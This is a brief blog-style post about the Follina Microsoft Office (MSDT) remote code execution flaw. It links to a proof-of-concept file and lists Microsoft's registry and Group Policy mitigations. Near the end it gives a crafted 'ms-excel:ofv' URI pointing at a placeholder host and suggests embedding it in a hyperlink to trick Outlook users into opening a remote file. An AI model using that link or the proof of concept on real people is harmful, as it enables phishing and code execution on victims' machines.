There is a new threat in Microsoft Office, this allows the remote execution of Powershell code on a target computer. This means that you can download an infected office document and then be open to an attack from a script that could do anything to your computer. There is a Proof of Concept file here: https://app.box.com/s/9oz1r90tzs7bstl0xy3zzfc8m92cqhcu. This is a sample exploit that will open calc.exe on the target computer, but you can do anything with this. Microsoft has issued a way to patch your system on May 30th 2022 which is essentially this. Run Command Prompt as Administrator.
To back up the registry key, execute this command.
"reg export HKEY_CLASSES_ROOT\ms-msdt filename" |
To delete the offending registry key execute this command.
reg delete HKEY_CLASSES_ROOT\ms-msdt /f |
A Group Policy mitigation for MSDT element, which is really good and easy to deploy:
Group Policy Editor -> Computer Configuration -> Administrative Templates -> System -> Troubleshooting and Diagnostics -> Scripted Diagnostics Set “Troubleshooting: Allow users to access and run Troubleshooting Wizards” to “disabled”
This should mitigate this security issue pretty well. This is a serious issue, but it is easily fixed and averted. Do not download suspicious files from the Internet and run them. Apparently, even viewing it as RTF is not safe. Microsoft software is not secure at all. This really needs to be fixed. Even viewing the file in preview in Explorer is not safe…
More information on this exploit is here: https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e. You can also use Microsoft Outlook as a target and trick a person into opening an XLS file using a crafted URL.
Just like this.
ms-excel:ofv|u|https://blah.com/poc.xls |
Craft a hyperlink with the above text and this will work in Outlook. Not a good look Microsoft.
